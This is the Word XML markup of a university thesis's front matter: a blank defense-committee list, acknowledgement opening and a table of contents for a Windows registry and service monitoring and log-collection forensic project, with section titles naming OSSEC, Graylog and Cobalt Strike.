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238383"/>
    <w:bookmarkStart w:id="1" w:name="_Hlk483998759"/>
    <w:bookmarkEnd w:id="0"/>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bookmarkStart w:id="2" w:name="OLE_LINK2"/>
      <w:bookmarkStart w:id="3" w:name="OLE_LINK3"/>
      <w:bookmarkStart w:id="4" w:name="OLE_LINK4"/>
      <w:r w:rsidR="00126710">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>MALICIOUS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidR="00126710">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">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5" w:name="_Toc483575477"/>
      <w:bookmarkStart w:id="6" w:name="_Toc483676740"/>
      <w:bookmarkStart w:id="7" w:name="_Toc483834684"/>
      <w:r w:rsidRPr="00E445CE">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>DANH SÁCH HỘI ĐỒNG BẢO VỆ KHÓA LUẬN</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkEnd w:id="6"/>
      <w:bookmarkEnd w:id="7"/>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r w:rsidRPr="00811A53">
        <w:t xml:space="preserve">Hội đồng chấm khóa luận tốt nghiệp, thành lập theo Quyết định số </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E31F6B" w:rsidRDefault="001425DB" w:rsidP="00AF4EA3">
      <w:pPr>
        <w:spacing w:after="164" w:line="359" w:lineRule="auto"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r w:rsidRPr="00811A53">
        <w:t xml:space="preserve">…………………… ngày ………………….. của Hiệu trưởng Trường Đại học Công nghệ Thông tin. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B02E5E" w:rsidRDefault="00B02E5E" w:rsidP="00B02E5E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="164" w:line="359" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="OLE_LINK1"/>
      <w:r>
        <w:t>……………………………………………</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>- Chủ tịch</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="8"/>
    <w:p w:rsidR="00B02E5E" w:rsidRDefault="00B02E5E" w:rsidP="00B02E5E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="164" w:line="359" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>……………………………………………</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>- Thư ký</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B02E5E" w:rsidRDefault="00B02E5E" w:rsidP="00B02E5E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="164" w:line="359" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>……………………………………………</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>- Ủy viên</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B02E5E" w:rsidRDefault="00B02E5E" w:rsidP="00B02E5E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="164" w:line="359" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>……………………………………………</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>- Ủy viên</w:t>
      </w:r>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9" w:name="_Toc483575478"/>
      <w:bookmarkStart w:id="10" w:name="_Toc483676741"/>
      <w:bookmarkStart w:id="11" w:name="_Toc483834685"/>
      <w:r w:rsidRPr="00E445CE">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>COMMENT OF INSTRUCTOR</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
      <w:bookmarkEnd w:id="10"/>
      <w:bookmarkEnd w:id="11"/>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2" w:name="_Toc483575479"/>
      <w:bookmarkStart w:id="13" w:name="_Toc483676742"/>
      <w:bookmarkStart w:id="14" w:name="_Toc483834686"/>
      <w:r w:rsidRPr="00E445CE">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>COMMENT OF REVIEWER</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
      <w:bookmarkEnd w:id="13"/>
      <w:bookmarkEnd w:id="14"/>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5" w:name="_Toc483575480"/>
      <w:bookmarkStart w:id="16" w:name="_Toc483676743"/>
      <w:bookmarkStart w:id="17" w:name="_Toc483834687"/>
      <w:r w:rsidRPr="00E445CE">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ACKNOWLEDGEMENT</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w:rsidR="000C0B89" w:rsidRDefault="00CD556F" w:rsidP="00CD556F">
      <w:r w:rsidRPr="00CD556F">
        <w:t>With supports and helps of many individuals, this thesis has become reality. We would like to express our appreciation to all of them. First of all,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1D1C85"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5239562" w:history="1">
            <w:r w:rsidR="001D1C85" w:rsidRPr="00F83CA9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Chapter 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INTRODUCTION</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485239562 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</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63" w:history="1">
            <w:r w:rsidR="001D1C85" w:rsidRPr="00F83CA9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1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Motivation</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485239563 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</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64" w:history="1">
            <w:r w:rsidR="001D1C85" w:rsidRPr="00F83CA9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2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Thesis’ statement</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485239564 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</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65" w:history="1">
            <w:r w:rsidR="001D1C85" w:rsidRPr="00F83CA9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.3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Subject</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485239565 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</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66" w:history="1">
            <w:r w:rsidR="001D1C85" w:rsidRPr="00F83CA9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4</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Scope</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485239566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67" w:history="1">
            <w:r w:rsidR="001D1C85" w:rsidRPr="00F83CA9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.5</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Registry monitoring module</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485239567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68" w:history="1">
            <w:r w:rsidR="001D1C85" w:rsidRPr="00F83CA9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.6</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Service monitoring module</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485239568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69" w:history="1">
            <w:r w:rsidR="001D1C85" w:rsidRPr="00F83CA9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.7</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Distributed Log Collector Hardware</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485239569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70" w:history="1">
            <w:r w:rsidR="001D1C85" w:rsidRPr="00F83CA9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.8</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Centralized Log Storage System</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485239570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71" w:history="1">
            <w:r w:rsidR="001D1C85" w:rsidRPr="00F83CA9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.9</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The needs of Forensic Toolkit</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485239571 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="001D1C85" w:rsidRDefault="00856098">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485239572" w:history="1">
            <w:r w:rsidR="001D1C85" w:rsidRPr="00F83CA9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Chapter 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BACKGROUND AND RELATED WORKS</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485239572 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</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73" w:history="1">
            <w:r w:rsidR="001D1C85" w:rsidRPr="00F83CA9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1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Related works</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485239573 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</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74" w:history="1">
            <w:r w:rsidR="001D1C85" w:rsidRPr="00F83CA9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1.1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OSSEC</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485239574 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</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75" w:history="1">
            <w:r w:rsidR="001D1C85" w:rsidRPr="00F83CA9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1.2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Samhain</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485239575 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</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76" w:history="1">
            <w:r w:rsidR="001D1C85" w:rsidRPr="00F83CA9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2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Background</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485239576 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</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77" w:history="1">
            <w:r w:rsidR="001D1C85" w:rsidRPr="00F83CA9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.1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Windows Registry</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485239577 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</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78" w:history="1">
            <w:r w:rsidR="001D1C85" w:rsidRPr="00F83CA9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.2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Windows Service</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485239578 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>19</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79" w:history="1">
            <w:r w:rsidR="001D1C85" w:rsidRPr="00F83CA9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.3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Graylog</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485239579 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>28</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80" w:history="1">
            <w:r w:rsidR="001D1C85" w:rsidRPr="00F83CA9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.4</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Reverse SSH Port Forwarding</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485239580 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>39</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81" w:history="1">
            <w:r w:rsidR="001D1C85" w:rsidRPr="00F83CA9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.5</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Cobalt Strike</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485239581 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>41</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82" w:history="1">
